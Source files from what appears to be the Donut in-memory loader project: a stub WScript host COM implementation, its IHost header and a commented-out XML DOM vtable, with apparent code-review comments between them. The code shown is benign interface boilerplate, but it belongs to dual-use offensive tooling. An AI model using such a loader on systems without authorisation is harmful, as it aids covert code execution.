146 LPOLESTR *rgszNames, UINT cNames, LCID lcid, DISPID *rgDispId) {
147 DPRINT("WScript::GetIDsOfNames");
148
149 return iface->lpTypeInfo->lpVtbl->GetIDsOfNames(iface->lpTypeInfo, rgszNames, cNames, rgDispId);
150 }
151
152 // Provides access to properties and methods exposed by an object.
153 // The dispatch function DispInvoke provides a standard implementation of Invoke.
154 static HRESULT WINAPI Host_Invoke(
155 IHost *iface, DISPID dispIdMember, REFIID riid,
156 LCID lcid, WORD wFlags, DISPPARAMS *pDispParams, VARIANT *pVarResult,
157 EXCEPINFO *pExcepInfo, UINT *puArgErr) {
158
159 DPRINT("WScript::Invoke");
160
161 HRESULT hr = iface->lpTypeInfo->lpVtbl->Invoke(
162 iface->lpTypeInfo, iface, dispIdMember, wFlags, pDispParams,
163 pVarResult, pExcepInfo, puArgErr);
164
165 DPRINT("HRESULT : %08lx", hr);
166
167 return hr;
168 }
169
170 // Returns the name of the WScript object (the host executable file).
171 static HRESULT WINAPI Host_get_Name(IHost *iface, BSTR *out_Name) {
172 DPRINT("WScript::Name");
173
174 return S_OK;
175 }
176
177 static HRESULT WINAPI Host_get_Application(IHost *iface, IDispatch **out_Dispatch) {
178 DPRINT("WScript::Application");
179
180 return E_NOTIMPL;
181 }
182
183 // Returns the fully qualified path of the host executable (CScript.exe or WScript.exe).
184 static HRESULT WINAPI Host_get_FullName(IHost *iface, BSTR *out_Path) {
185 DPRINT("WScript::FullName");
186
187 return E_NOTIMPL;
188 }
189
190 static HRESULT WINAPI Host_get_Path(IHost *iface, BSTR *out_Path) {
191 DPRINT("WScript::Path");
192
193 return E_NOTIMPL;
194 }
195
196 // Gets the script mode, or identifies the script mode.
197 static HRESULT WINAPI Host_get_Interactive(IHost *iface, VARIANT_BOOL *out_Interactive) {
198 DPRINT("WScript::get_Interactive");
199
200 return E_NOTIMPL;
201 }
202
203 // Sets the script mode, or identifies the script mode.
204 static HRESULT WINAPI Host_put_Interactive(IHost *iface, VARIANT_BOOL v) {
205 DPRINT("WScript::put_Interactive");
206
207 return E_NOTIMPL;
208 }
209
210 // Forces script execution to stop at any time.
211 static HRESULT WINAPI Host_Quit(IHost *iface, int ExitCode) {
212 DPRINT("WScript::Quit(%i)", ExitCode);
213
214 // if you know of a better way to do this..let me know.
215 iface->lpEngine->lpVtbl->InterruptScriptThread(iface->lpEngine, SCRIPTTHREADID_CURRENT, NULL, 0);
216
217 return S_OK;
218 }
219
220 // Returns the file name of the currently running script.
221 static HRESULT WINAPI Host_get_ScriptName(IHost *iface, BSTR *out_ScriptName) {
222 DPRINT("WScript::ScriptName");
223
224 return E_NOTIMPL;
225 }
226
227 // Returns the full path of the currently running script.
228 static HRESULT WINAPI Host_get_ScriptFullName(IHost *iface, BSTR *out_ScriptFullName) {
229 DPRINT("WScript::ScriptFullName");
230
231 return E_NOTIMPL;
232 }
233
234 // Returns the WshArguments object (a collection of arguments).
235 static HRESULT WINAPI Host_get_Arguments(
236 IHost *iface, void **out_Arguments) { // IArguments2
237 DPRINT("WScript::Arguments");
238
239 return E_NOTIMPL;
240 }
241
242 static HRESULT WINAPI Host_get_Version(IHost *iface, BSTR *out_Version) {
243 DPRINT("WScript::Version");
244
245 return E_NOTIMPL;
246 }
247
248 // Returns the Windows Script Host build version number.
249 static HRESULT WINAPI Host_get_BuildVersion(IHost *iface, int *out_Build) {
250 DPRINT("WScript::BuildVersion");
251
252 return E_NOTIMPL;
253 }
254
255 static HRESULT WINAPI Host_get_Timeout(IHost *iface, LONG *out_Timeout) {
256 DPRINT("WScript::get_Timeout");
257
258 return E_NOTIMPL;
259 }
260
261 static HRESULT WINAPI Host_put_Timeout(IHost *iface, LONG v) {
262 DPRINT("WScript::put_Timeout");
263
264 return E_NOTIMPL;
265 }
266
267 // Connects the object's event sources to functions with a given prefix.
268 static HRESULT WINAPI Host_CreateObject(IHost *iface, BSTR ProgID, BSTR Prefix,
269 IDispatch **out_Dispatch) {
270 DPRINT("WScript::CreateObject");
271
272 return E_NOTIMPL;
273 }
274
275 // Outputs text to either a message box or the command console window.
276 static HRESULT WINAPI Host_Echo(
277 IHost *iface, SAFEARRAY *args) {
278 DPRINT("WScript::Echo");
279
280 return E_NOTIMPL;
281 }
282
283 // Retrieves an existing object with the specified ProgID, or creates a new one from a file.
284 static HRESULT WINAPI Host_GetObject(
285 IHost *iface, BSTR Pathname, BSTR ProgID,
286 BSTR Prefix, IDispatch **out_Dispatch) {
287 DPRINT("WScript::GetObject");
288
289 return E_NOTIMPL;
290 }
291
292 // Disconnects a connected object's event sources.
293 static HRESULT WINAPI Host_DisconnectObject(
294 IHost *iface, IDispatch *Object) {
295 DPRINT("WScript::DisconnectObject");
296
297 return E_NOTIMPL;
298 }
299
300 // Suspends script execution for a specified length of time, then continues execution.
301 static HRESULT WINAPI Host_Sleep(
302 IHost *iface, LONG Time) {
303
304 DPRINT("WScript::Sleep");
305 iface->inst->api.Sleep((DWORD)Time);
306
307 return S_OK;
308 }
309
310 // Connects the object's event sources to functions with a given prefix.
311 static HRESULT WINAPI Host_ConnectObject(
312 IHost *iface, IDispatch *Object, BSTR Prefix) {
313 DPRINT("WScript::ConnectObject");
314
315 return E_NOTIMPL;
316 }
317
318 // Exposes the read-only input stream for the current script.
319 static HRESULT WINAPI Host_get_StdIn(
320 IHost *iface, void **ppts) { // ppts is ITextStream
321 DPRINT("WScript::StdIn");
322
323 return E_NOTIMPL;
324 }
325
326 // Exposes the write-only output stream for the current script.
327 static HRESULT WINAPI Host_get_StdOut(
328 IHost *iface, void **ppts) { // ppts is ITextStream
329 DPRINT("WScript::StdOut");
330
331 return E_NOTIMPL;
332 }
333
334 // Exposes the write-only error output stream for the current script.
335 static HRESULT WINAPI Host_get_StdErr(
336 IHost *iface, void **ppts) { // ppts is ITextStream
337 DPRINT("WScript::StdErr");
338
339 return E_NOTIMPL;
340 }
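Review bot: `Host_get_Name` returns `S_OK` without writing `*out_Name`, so a script reading `WScript.Name` receives success paired with an indeterminate BSTR that a caller trusting the HRESULT may then use or free; either populate the out-parameter or fall in line with the other unimplemented getters and `return E_NOTIMPL;`. Relatedly, `Host_AddRef` discards the value returned by `_InterlockedIncrement` and re-reads `iface->m_cRef` unsynchronised, so under concurrent AddRef/Release the count handed back can differ from the one this call produced; `return _InterlockedIncrement(&iface->m_cRef);` mirrors what `Host_Release` already does (and note `m_cRef` is `ULONG` while the intrinsic takes `LONG volatile *`, which is worth checking for a type mismatch). `Host_GetTypeInfo` also ignores `iTInfo`; the IDispatch contract expects `if(iTInfo != 0) return DISP_E_BADINDEX;` before handing out the type info.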
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #ifndef WSCRIPT_H
32 #define WSCRIPT_H
33
34 #include "../include/donut.h"
35
36 typedef struct _IHost IHost;
37
38 typedef struct _IHostVtbl {
39 BEGIN_INTERFACE
40
41 HRESULT (STDMETHODCALLTYPE *QueryInterface)(
42 IHost *This,
43 REFIID riid,
44 void **ppvObject);
45
46 ULONG (STDMETHODCALLTYPE *AddRef)(IHost *This);
47
48 ULONG (STDMETHODCALLTYPE *Release)(IHost *This);
49
50 HRESULT (STDMETHODCALLTYPE *GetTypeInfoCount)(
51 IHost *This,
52 UINT *pctinfo);
53
54 HRESULT (STDMETHODCALLTYPE *GetTypeInfo)(
55 IHost *This,
56 UINT iTInfo,
57 LCID lcid,
58 ITypeInfo **ppTInfo);
59
60 HRESULT (STDMETHODCALLTYPE *GetIDsOfNames)(
61 IHost *This,
62 REFIID riid,
63 LPOLESTR *rgszNames,
64 UINT cNames,
65 LCID lcid,
66 DISPID *rgDispId);
67
68 HRESULT (STDMETHODCALLTYPE *Invoke)(
69 IHost *This,
70 DISPID dispIdMember,
71 REFIID riid,
72 LCID lcid,
73 WORD wFlags,
74 DISPPARAMS *pDispParams,
75 VARIANT *pVarResult,
76 EXCEPINFO *pExcepInfo,
77 UINT *puArgErr);
78
79 HRESULT (STDMETHODCALLTYPE *get_Name)(
80 IHost *This,
81 BSTR *out_Name);
82
83 HRESULT (STDMETHODCALLTYPE *get_Application)(
84 IHost *This,
85 IDispatch **out_Dispatch);
86
87 HRESULT (STDMETHODCALLTYPE *get_FullName)(
88 IHost *This,
89 BSTR *out_Path);
90
91 HRESULT (STDMETHODCALLTYPE *get_Path)(
92 IHost *This,
93 BSTR *out_Path);
94
95 HRESULT (STDMETHODCALLTYPE *get_Interactive)(
96 IHost *This,
97 VARIANT_BOOL *out_Interactive);
98
99 HRESULT (STDMETHODCALLTYPE *put_Interactive)(
100 IHost *This,
101 VARIANT_BOOL v);
102
103 HRESULT (STDMETHODCALLTYPE *Quit)(
104 IHost *This,
105 int ExitCode);
106
107 HRESULT (STDMETHODCALLTYPE *get_ScriptName)(
108 IHost *This,
109 BSTR *out_ScriptName);
110
111 HRESULT (STDMETHODCALLTYPE *get_ScriptFullName)(
112 IHost *This,
113 BSTR *out_ScriptFullName);
114
115 HRESULT (STDMETHODCALLTYPE *get_Arguments)(
116 IHost *This,
117 void **out_Arguments);
118
119 HRESULT (STDMETHODCALLTYPE *get_Version)(
120 IHost *This,
121 BSTR *out_Version);
122
123 HRESULT (STDMETHODCALLTYPE *get_BuildVersion)(
124 IHost *This,
125 int *out_Build);
126
127 HRESULT (STDMETHODCALLTYPE *get_Timeout)(
128 IHost *This,
129 LONG *out_Timeout);
130
131 HRESULT (STDMETHODCALLTYPE *put_Timeout)(
132 IHost *This,
133 LONG v);
134
135 HRESULT (STDMETHODCALLTYPE *CreateObject)(
136 IHost *This,
137 BSTR ProgID,
138 BSTR Prefix,
139 IDispatch **out_Dispatch);
140
141 HRESULT (STDMETHODCALLTYPE *Echo)(
142 IHost *This,
143 SAFEARRAY *args);
144
145 HRESULT (STDMETHODCALLTYPE *GetObject)(
146 IHost *This,
147 BSTR Pathname,
148 BSTR ProgID,
149 BSTR Prefix,
150 IDispatch **out_Dispatch);
151
152 HRESULT (STDMETHODCALLTYPE *DisconnectObject)(
153 IHost *This,
154 IDispatch *Object);
155
156 HRESULT (STDMETHODCALLTYPE *Sleep)(
157 IHost *This,
158 LONG Time);
159
160 HRESULT (STDMETHODCALLTYPE *ConnectObject)(
161 IHost *This,
162 IDispatch *Object,
163 BSTR Prefix);
164
165 HRESULT (STDMETHODCALLTYPE *get_StdIn)(
166 IHost *This,
167 void **ppts);
168
169 HRESULT (STDMETHODCALLTYPE *get_StdOut)(
170 IHost *This,
171 void **ppts);
172
173 HRESULT (STDMETHODCALLTYPE *get_StdErr)(
174 IHost *This,
175 void **ppts);
176
177 END_INTERFACE
178 } IHostVtbl;
179
180 typedef struct _IHost {
181 IHostVtbl *lpVtbl; // virtual function table
182 ITypeLib *lpTypeLib; // type library
183 ITypeInfo *lpTypeInfo; // type information for WScript properties/methods
184 IActiveScript *lpEngine; // IActiveScript engine from main thread
185 ULONG m_cRef; // reference count
186 PDONUT_INSTANCE inst;
187 } IHost;
188
189 static HRESULT Host_New(PDONUT_INSTANCE inst, IHost *host);
190
191 // Queries a COM object for a pointer to one of its interface.
192 static STDMETHODIMP Host_QueryInterface(IHost *This, REFIID riid, void **ppv);
193
194 // Increments the reference count for an interface pointer to a COM object.
195 static STDMETHODIMP_(ULONG) Host_AddRef(IHost *This);
196
197 // Decrements the reference count for an interface on a COM object.
198 static STDMETHODIMP_(ULONG) Host_Release(IHost *This);
199
200 // Retrieves the number of type information interfaces that an object provides (either 0 or 1).
201 static STDMETHODIMP Host_GetTypeInfoCount(IHost *This, UINT *pctinfo);
202
203 // Retrieves the type information for an object, which can then be used to get the type information for an interface.
204 static STDMETHODIMP Host_GetTypeInfo(IHost *This, UINT iTInfo, LCID lcid, ITypeInfo **ppTInfo);
205
206 // Maps a single member and an optional set of argument names to a corresponding set of integer DISPIDs,
207 // which can be used on subsequent calls to Invoke.
208 static STDMETHODIMP Host_GetIDsOfNames(
209 IHost *This, REFIID riid, LPOLESTR *rgszNames,
210 UINT cNames, LCID lcid, DISPID *rgDispId);
211
212 // Provides access to properties and methods exposed by an object.
213 // The dispatch function DispInvoke provides a standard implementation of Invoke.
214 static STDMETHODIMP Host_Invoke(
215 IHost *This, DISPID dispIdMember, REFIID riid,
216 LCID lcid, WORD wFlags, DISPPARAMS *pDispParams, VARIANT *pVarResult,
217 EXCEPINFO *pExcepInfo, UINT *puArgErr);
218
219 // Returns the name of the WScript object (the host executable file).
220 static STDMETHODIMP Host_get_Name(IHost *This, BSTR *out_Name);
221
222 static STDMETHODIMP Host_get_Application(IHost *This, IDispatch **out_Dispatch);
223
224 // Returns the fully qualified path of the host executable (CScript.exe or WScript.exe).
225 static STDMETHODIMP Host_get_FullName(IHost *This, BSTR *out_Path);
226
227 static STDMETHODIMP Host_get_Path(IHost *This, BSTR *out_Path);
228
229 // Gets the script mode, or identifies the script mode.
230 static STDMETHODIMP Host_get_Interactive(IHost *This, VARIANT_BOOL *out_Interactive);
231
232 // Sets the script mode, or identifies the script mode.
233 static STDMETHODIMP Host_put_Interactive(IHost *This, VARIANT_BOOL v);
234
235 // Forces script execution to stop at any time.
236 static STDMETHODIMP Host_Quit(IHost *This, int ExitCode);
237
238 // Returns the file name of the currently running script.
239 static STDMETHODIMP Host_get_ScriptName(IHost *This, BSTR *out_ScriptName);
240
241 // Returns the full path of the currently running script.
242 static STDMETHODIMP Host_get_ScriptFullName(IHost *This, BSTR *out_ScriptFullName);
243
244 // Returns the WshArguments object (a collection of arguments).
245 static STDMETHODIMP Host_get_Arguments(IHost *This, void **out_Arguments);
246
247 static STDMETHODIMP Host_get_Version(IHost *This, BSTR *out_Version);
248
249 // Returns the Windows Script Host build version number.
250 static STDMETHODIMP Host_get_BuildVersion(IHost *This, int *out_Build);
251
252 static STDMETHODIMP Host_get_Timeout(IHost *This, LONG *out_Timeout);
253
254 static STDMETHODIMP Host_put_Timeout(IHost *This, LONG v);
255
256 // Connects the object's event sources to functions with a given prefix.
257 static STDMETHODIMP Host_CreateObject(IHost *This, BSTR ProgID, BSTR Prefix, IDispatch **out_Dispatch);
258
259 // Outputs text to either a message box or the command console window.
260 static STDMETHODIMP Host_Echo(IHost *This, SAFEARRAY *args);
261
262 // Retrieves an existing object with the specified ProgID, or creates a new one from a file.
263 static STDMETHODIMP Host_GetObject(IHost *This, BSTR Pathname, BSTR ProgID, BSTR Prefix, IDispatch **out_Dispatch);
264
265 // Disconnects a connected object's event sources.
266 static STDMETHODIMP Host_DisconnectObject(IHost *This, IDispatch *Object);
267
268 // Suspends script execution for a specified length of time, then continues execution.
269 static STDMETHODIMP Host_Sleep(IHost *This, LONG Time);
270
271 // Connects the object's event sources to functions with a given prefix.
272 static STDMETHODIMP Host_ConnectObject(IHost *This, IDispatch *Object, BSTR Prefix);
273
274 // Exposes the read-only input stream for the current script.
275 static STDMETHODIMP Host_get_StdIn(IHost *This, void **ppts);
276
277 // Exposes the write-only output stream for the current script.
278 static STDMETHODIMP Host_get_StdOut(IHost *This, void **ppts);
279
280 // Exposes the write-only error output stream for the current script.
281 static STDMETHODIMP Host_get_StdErr(IHost *This, void **ppts);
282
283 #endif
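Review bot: The `IHost` struct does not document who sets `lpEngine`: `Host_New` in the companion source initialises `m_cRef`, `inst`, `lpTypeLib` and `lpTypeInfo` but never `lpEngine`, while `Host_Quit` dereferences it unconditionally, so the field is a caller-populated precondition rather than part of construction. Suggest making that explicit on the member, e.g. `IActiveScript *lpEngine; // set by the owner after Host_New(); must be non-NULL before a script can call Quit`, and giving `inst` a matching one-line comment, since it is the only member without one. `Host_New` is also the one prototype here without a description; a line such as `// Fills the vtable, loads the WScript type library and caches the IHost type info; returns the HRESULT of the failing step` would match the rest of the header.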
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 /**
32 typedef struct IXMLDOMNodeVtbl {
33 BEGIN_INTERFACE
34
35 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
36 IXMLDOMNode * This,
37 REFIID riid,
38 void **ppvObject);
39
40 ULONG ( STDMETHODCALLTYPE *AddRef )(
41 IXMLDOMNode * This);
42
43 ULONG ( STDMETHODCALLTYPE *Release )(
44 IXMLDOMNode * This);
45
46 HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )(
47 IXMLDOMNode * This,
48 UINT *pctinfo);
49
50 HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )(
51 IXMLDOMNode * This,
52 UINT iTInfo,
53 LCID lcid,
54 ITypeInfo **ppTInfo);
55
56 HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )(
57 IXMLDOMNode * This,
58 REFIID riid,
59 LPOLESTR *rgszNames,
60 UINT cNames,
61 LCID lcid,
62 DISPID *rgDispId);
63
64 HRESULT ( STDMETHODCALLTYPE *Invoke )(
65 IXMLDOMNode * This,
66 DISPID dispIdMember,
67 REFIID riid,
68 LCID lcid,
69 WORD wFlags,
70 DISPPARAMS *pDispParams,
71 VARIANT *pVarResult,
72 EXCEPINFO *pExcepInfo,
73 UINT *puArgErr);
74
75 HRESULT ( STDMETHODCALLTYPE *get_nodeName )(
76 IXMLDOMNode * This,
77 BSTR *name);
78
79 HRESULT ( STDMETHODCALLTYPE *get_nodeValue )(
80 IXMLDOMNode * This,
81 VARIANT *value);
82
83 HRESULT ( STDMETHODCALLTYPE *put_nodeValue )(
84 IXMLDOMNode * This,
85 VARIANT value);
86
87 HRESULT ( STDMETHODCALLTYPE *get_nodeType )(
88 IXMLDOMNode * This,
89 DOMNodeType *type);
90
91 HRESULT ( STDMETHODCALLTYPE *get_parentNode )(
92 IXMLDOMNode * This,
93 IXMLDOMNode **parent);
94
95 HRESULT ( STDMETHODCALLTYPE *get_childNodes )(
96 IXMLDOMNode * This,
97 IXMLDOMNodeList **childList);
98
99 HRESULT ( STDMETHODCALLTYPE *get_firstChild )(
100 IXMLDOMNode * This,
101 IXMLDOMNode **firstChild);
102
103 HRESULT ( STDMETHODCALLTYPE *get_lastChild )(
104 IXMLDOMNode * This,
105 IXMLDOMNode **lastChild);
106
107 HRESULT ( STDMETHODCALLTYPE *get_previousSibling )(
108 IXMLDOMNode * This,
109 IXMLDOMNode **previousSibling);
110
111 HRESULT ( STDMETHODCALLTYPE *get_nextSibling )(
112 IXMLDOMNode * This,
113 IXMLDOMNode **nextSibling);
114
115 HRESULT ( STDMETHODCALLTYPE *get_attributes )(
116 IXMLDOMNode * This,
117 IXMLDOMNamedNodeMap **attributeMap);
118
119 HRESULT ( STDMETHODCALLTYPE *insertBefore )(
120 IXMLDOMNode * This,
121 IXMLDOMNode *newChild,
122 VARIANT refChild,
123 IXMLDOMNode **outNewChild);
124
125 HRESULT ( STDMETHODCALLTYPE *replaceChild )(
126 IXMLDOMNode * This,
127 IXMLDOMNode *newChild,
128 IXMLDOMNode *oldChild,
129 IXMLDOMNode **outOldChild);
130
131 HRESULT ( STDMETHODCALLTYPE *removeChild )(
132 IXMLDOMNode * This,
133 IXMLDOMNode *childNode,
134 IXMLDOMNode **oldChild);
135
136 HRESULT ( STDMETHODCALLTYPE *appendChild )(
137 IXMLDOMNode * This,
138 IXMLDOMNode *newChild,
139 IXMLDOMNode **outNewChild);
140
141 HRESULT ( STDMETHODCALLTYPE *hasChildNodes )(
142 IXMLDOMNode * This,
143 VARIANT_BOOL *hasChild);
144
145 HRESULT ( STDMETHODCALLTYPE *get_ownerDocument )(
146 IXMLDOMNode * This,
147 IXMLDOMDocument **XMLDOMDocument);
148
149 HRESULT ( STDMETHODCALLTYPE *cloneNode )(
150 IXMLDOMNode * This,
151 VARIANT_BOOL deep,
152 IXMLDOMNode **cloneRoot);
153
154 HRESULT ( STDMETHODCALLTYPE *get_nodeTypeString )(
155 IXMLDOMNode * This,
156 BSTR *nodeType);
157
158 HRESULT ( STDMETHODCALLTYPE *get_text )(
159 IXMLDOMNode * This,
160 BSTR *text);
161
162 HRESULT ( STDMETHODCALLTYPE *put_text )(
163 IXMLDOMNode * This,
164 BSTR text);
165
166 HRESULT ( STDMETHODCALLTYPE *get_specified )(
167 IXMLDOMNode * This,
168 VARIANT_BOOL *isSpecified);
169
170 HRESULT ( STDMETHODCALLTYPE *get_definition )(
171 IXMLDOMNode * This,
172 IXMLDOMNode **definitionNode);
173
174 HRESULT ( STDMETHODCALLTYPE *get_nodeTypedValue )(
175 IXMLDOMNode * This,
176 VARIANT *typedValue);
177
178 HRESULT ( STDMETHODCALLTYPE *put_nodeTypedValue )(
179 IXMLDOMNode * This,
180 VARIANT typedValue);
181
182 HRESULT ( STDMETHODCALLTYPE *get_dataType )(
183 IXMLDOMNode * This,
184 VARIANT *dataTypeName);
185
186 HRESULT ( STDMETHODCALLTYPE *put_dataType )(
187 IXMLDOMNode * This,
188 BSTR dataTypeName);
189
190 HRESULT ( STDMETHODCALLTYPE *get_xml )(
191 IXMLDOMNode * This,
192 BSTR *xmlString);
193
194 HRESULT ( STDMETHODCALLTYPE *transformNode )(
195 IXMLDOMNode * This,
196 IXMLDOMNode *stylesheet,
197 BSTR *xmlString);
198
199 HRESULT ( STDMETHODCALLTYPE *selectNodes )(
200 IXMLDOMNode * This,
201 BSTR queryString,
202 IXMLDOMNodeList **resultList);
203
204 HRESULT ( STDMETHODCALLTYPE *selectSingleNode )(
205 IXMLDOMNode * This,
206 BSTR queryString,
207 IXMLDOMNode **resultNode);
208
209 HRESULT ( STDMETHODCALLTYPE *get_parsed )(
210 IXMLDOMNode * This,
211 VARIANT_BOOL *isParsed);
212
213 HRESULT ( STDMETHODCALLTYPE *get_namespaceURI )(
214 IXMLDOMNode * This,
215 BSTR *namespaceURI);
216
217 HRESULT ( STDMETHODCALLTYPE *get_prefix )(
218 IXMLDOMNode * This,
219 BSTR *prefixString);
220
221 HRESULT ( STDMETHODCALLTYPE *get_baseName )(
222 IXMLDOMNode * This,
223 BSTR *nameString);
224
225 HRESULT ( STDMETHODCALLTYPE *transformNodeToObject )(
226 IXMLDOMNode * This,
227 IXMLDOMNode *stylesheet,
228 VARIANT outputObject);
229
230 END_INTERFACE
231 } IXMLDOMNodeVtbl;
232
233 typedef struct _IXMLDOMNode {
234 IXMLDOMNodeVtbl *lpVtbl;
235 } XMLDOMNode;
236
237 typedef struct IXMLDOMDocumentVtbl {
238 BEGIN_INTERFACE
239
240 HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
241 IXMLDOMDocument * This,
242 REFIID riid,
243
244 __RPC__deref_out void **ppvObject);
245
246 ULONG ( STDMETHODCALLTYPE *AddRef )(
247 IXMLDOMDocument * This);
248
249 ULONG ( STDMETHODCALLTYPE *Release )(
250 IXMLDOMDocument * This);
251
252 HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )(
253 IXMLDOMDocument * This,
254 UINT *pctinfo);
255
256 HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )(
257 IXMLDOMDocument * This,
258 UINT iTInfo,
259 LCID lcid,
260 ITypeInfo **ppTInfo);
261
262 HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )(
263 IXMLDOMDocument * This,
264 REFIID riid,
265 LPOLESTR *rgszNames,
266 UINT cNames,
267 LCID lcid,
268 DISPID *rgDispId);
269
270 HRESULT ( STDMETHODCALLTYPE *Invoke )(
271 IXMLDOMDocument * This,
272 DISPID dispIdMember,
273 REFIID riid,
274 LCID lcid,
275 WORD wFlags,
276 DISPPARAMS *pDispParams,
277 VARIANT *pVarResult,
278 EXCEPINFO *pExcepInfo,
279 UINT *puArgErr);
280
281 HRESULT ( STDMETHODCALLTYPE *get_nodeName )(
282 IXMLDOMDocument * This,
283 BSTR *name);
284
285 HRESULT ( STDMETHODCALLTYPE *get_nodeValue )(
286 IXMLDOMDocument * This,
287 VARIANT *value);
288
289 HRESULT ( STDMETHODCALLTYPE *put_nodeValue )(
290 IXMLDOMDocument * This,
291 VARIANT value);
292
293 HRESULT ( STDMETHODCALLTYPE *get_nodeType )(
294 IXMLDOMDocument * This,
295 DOMNodeType *type);
296
297 HRESULT ( STDMETHODCALLTYPE *get_parentNode )(
298 IXMLDOMDocument * This,
299 IXMLDOMNode **parent);
300
301 HRESULT ( STDMETHODCALLTYPE *get_childNodes )(
302 IXMLDOMDocument * This,
303 IXMLDOMNodeList **childList);
304
305 HRESULT ( STDMETHODCALLTYPE *get_firstChild )(
306 IXMLDOMDocument * This,
307 IXMLDOMNode **firstChild);
308
309 HRESULT ( STDMETHODCALLTYPE *get_lastChild )(
310 IXMLDOMDocument * This,
311 IXMLDOMNode **lastChild);
312
313 HRESULT ( STDMETHODCALLTYPE *get_previousSibling )(
314 IXMLDOMDocument * This,
315 IXMLDOMNode **previousSibling);
316
317 HRESULT ( STDMETHODCALLTYPE *get_nextSibling )(
318 IXMLDOMDocument * This,
319 IXMLDOMNode **nextSibling);
320
321 HRESULT ( STDMETHODCALLTYPE *get_attributes )(
322 IXMLDOMDocument * This,
323 IXMLDOMNamedNodeMap **attributeMap);
324
325 HRESULT ( STDMETHODCALLTYPE *insertBefore )(
326 IXMLDOMDocument * This,
327 IXMLDOMNode *newChild,
328 VARIANT refChild,
329 IXMLDOMNode **outNewChild);
330
331 HRESULT ( STDMETHODCALLTYPE *replaceChild )(
332 IXMLDOMDocument * This,
333 IXMLDOMNode *newChild,
334 IXMLDOMNode *oldChild,
335 IXMLDOMNode **outOldChild);
336
337 HRESULT ( STDMETHODCALLTYPE *removeChild )(
338 IXMLDOMDocument * This,
339 IXMLDOMNode *childNode,
340 IXMLDOMNode **oldChild);
341
342 HRESULT ( STDMETHODCALLTYPE *appendChild )(
343 IXMLDOMDocument * This,
344 IXMLDOMNode *newChild,
345 IXMLDOMNode **outNewChild);
346
347 HRESULT ( STDMETHODCALLTYPE *hasChildNodes )(
348 IXMLDOMDocument * This,
349 VARIANT_BOOL *hasChild);
350
351 HRESULT ( STDMETHODCALLTYPE *get_ownerDocument )(
352 IXMLDOMDocument * This,
353 IXMLDOMDocument **XMLDOMDocument);
354
355 HRESULT ( STDMETHODCALLTYPE *cloneNode )(
356 IXMLDOMDocument * This,
357 VARIANT_BOOL deep,
358 IXMLDOMNode **cloneRoot);
359
360 HRESULT ( STDMETHODCALLTYPE *get_nodeTypeString )(
361 IXMLDOMDocument * This,
362 BSTR *nodeType);
363
364 HRESULT ( STDMETHODCALLTYPE *get_text )(
365 IXMLDOMDocument * This,
366 BSTR *text);
367
368 HRESULT ( STDMETHODCALLTYPE *put_text )(
369 IXMLDOMDocument * This,
370 BSTR text);
371
372 HRESULT ( STDMETHODCALLTYPE *get_specified )(
373 IXMLDOMDocument * This,
374 VARIANT_BOOL *isSpecified);
375
376 HRESULT ( STDMETHODCALLTYPE *get_definition )(
